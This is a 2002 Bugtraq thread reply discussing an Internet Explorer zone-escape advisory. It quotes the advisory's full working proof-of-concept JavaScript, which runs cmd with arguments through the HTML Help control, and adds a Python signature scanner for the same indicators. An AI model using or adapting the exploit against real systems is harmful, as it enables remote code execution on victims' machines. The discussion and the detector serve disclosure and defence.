RE: How to execute programs with parameters in IE - Sandblad advisory #10

From: Thor Larholm (thor@pivx.com)
Date: 11/07/02


From: "Thor Larholm" <thor@pivx.com>
To: <bugtraq@securityfocus.com>, "Andreas Sandblad" <sandblad@acc.umu.se>
Date: Thu, 7 Nov 2002 10:53:28 +0100

Unless I am missing something, this is definitely not a vulnerability in
itself but just a practical demonstration of the "assign method caching"
vulnerability.

Executing programs with or without parameters also becomes pointless once you
have complete access to a local security zone (in this case, given by the
"assign method caching" vuln), as demonstrated by http-equiv quite a few
times. Circumventing the zone barriers allows you to (among other things)
retrieve the location of that funny malware you just planted in the user's
Temporary Internet Files, and subsequently execute it.

The HTMLHelp Control used in this example only has the authority to execute
commands at all because it is being used from a local security zone. As
such, when Microsoft are claiming that "the technique used to run programs
with parameters from the 'Local computer zone' was no security
vulnerability", they are in my opinion correct.
Despite this, it is always interesting to have more approaches to program
execution for demonstration purposes once you get your foot inside the door
of a local security zone, especially since the "codebase localpath" approach
is practically filtered everywhere in its pure form.

IE6 SP1 did include some early attempts at preventing any interaction
between security zones (specifically from the Internet zone to any local
zone). That attempt was broken with the object redirect approach. It will be
interesting to see what Microsoft comes up with next to prevent interaction
between security zones.

Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?
http://www.PivX.com

-----Original Message-----
From: Andreas Sandblad [mailto:sandblad@acc.umu.se]
Sent: 6. november 2002 20:48
To: bugtraq@securityfocus.com
Subject: How to execute programs with parameters in IE - Sandblad
advisory #10
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
   "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
   "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
   "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
--------------------------- CUT HERE ---------------------------
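Added example (not part of either message in this thread): a content-inspection signature, in Python, for the indicators the quoted advisory exposes. The indicator names and the `scan`/`collapse_concat` helpers are my own; the HTML Help CLSID, the `mk:@MSITStore:` and `res:` hops and the cached `opener.location.assign` reference come from the quoted code. The point a filter author would want to see is that the advisory splits the CLSID across concatenated JavaScript string literals, so a signature run over the raw source misses it unless the concatenation seams are collapsed first.

```python
import re

# Indicators taken from the Sandblad #10 code quoted in the post above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # HTML Help ActiveX control

# Each indicator is a hypothetical signature name (not from the post) mapped
# to a regex over the HTML/JS source being inspected.
INDICATORS = {
    # HTML Help control instantiated with the ShortCut command
    "hhctrl_shortcut": re.compile(
        r"clsid:" + re.escape(HHCTRL_CLSID) + r".*?Command\s+value\s*=\s*ShortCut",
        re.I | re.S),
    # navigation into the compiled-help pseudo-protocol (local zone)
    "msitstore_zone_hop": re.compile(r"mk:@MSITStore:", re.I),
    # navigation into the res: protocol (local zone)
    "res_protocol": re.compile(r"""location\s*=\s*['"]res:""", re.I),
    # a cached reference to another window's location.assign method
    "cached_assign": re.compile(r"opener\.location\.assign", re.I),
}

# The seam between two adjacent string literals: "..."+"..." or '...'+'...',
# with any whitespace (including a line break) around the plus sign.
_CONCAT_SEAM = re.compile(r"""["']\s*\+\s*["']""")


def collapse_concat(source):
    """Join adjacent string literals so a token split across them
    ("adb"+"880a6-...") is visible to the signatures as one token."""
    return _CONCAT_SEAM.sub("", source)


def scan(source, collapse=True):
    """Return the sorted indicator names that fire on the given source."""
    text = collapse_concat(source) if collapse else source
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample (not the advisory itself): the CLSID and the ShortCut
# parameter are split across concatenated literals the same way the quoted
# code does it.
SAMPLE_SPLIT = (
    'var f = opener.location.assign;\n'
    'f("javascript:document.write(\'<object id=c1 classid=clsid:adb"+\n'
    '   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+\n'
    '   "=ShortCut></object>\')");\n'
    'f("javascript:location.replace(\'mk:@MSITStore:C:\')");\n'
)

# Constructed benign page for comparison: a plain link to a .chm file is
# not an indicator on its own.
SAMPLE_BENIGN = (
    '<html><body><script>document.title = "Intranet portal";</script>'
    '<a href="manual.chm">Download the help file</a></body></html>\n'
)

if __name__ == "__main__":
    print("split, raw:      ", scan(SAMPLE_SPLIT, collapse=False))
    print("split, collapsed:", scan(SAMPLE_SPLIT))
    print("benign:          ", scan(SAMPLE_BENIGN))
```

Run over the raw sample, only the `mk:@MSITStore:` hop and the cached `assign` reference fire; after collapsing the seams the HTML Help indicator fires as well. A proxy or mail-gateway filter that inspects script bodies should therefore normalize literal concatenation (and, in practice, other trivial obfuscations such as `String.fromCharCode` and entity encoding) before applying keyword signatures.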